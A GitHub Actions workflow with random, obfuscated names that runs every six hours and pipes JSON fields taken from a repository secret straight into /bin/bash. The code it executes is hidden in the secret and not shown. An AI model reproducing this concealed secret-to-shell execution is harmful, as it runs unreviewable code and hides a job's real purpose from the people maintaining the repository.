name: shidatin
on:
  workflow_dispatch:
  schedule:
    - cron: '58 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shidatin
        env:
          tasbn1511: ${{ secrets.tasbn1511 }}
        run: |
          echo $tasbn1511 | jq -r .qviwc92 | /bin/bash
          echo $nw84578 | jq -r .t3 | /bin/bash
          echo $h838 | jq -r .u719 | /bin/bash
          echo $zkfha8098 | jq -r .vjhv69953 | /bin/bash
          echo $qhylq83503 | jq -r .kygoz6 | /bin/bash
          echo $xp542 | jq -r .kw5707 | /bin/bash
          echo $os79169 | jq -r .iwexy38 | /bin/bash
          echo $e47857 | jq -r .tfa0030 | /bin/bash
          echo $mngk92217 | jq -r .zkucu0840 | /bin/bash

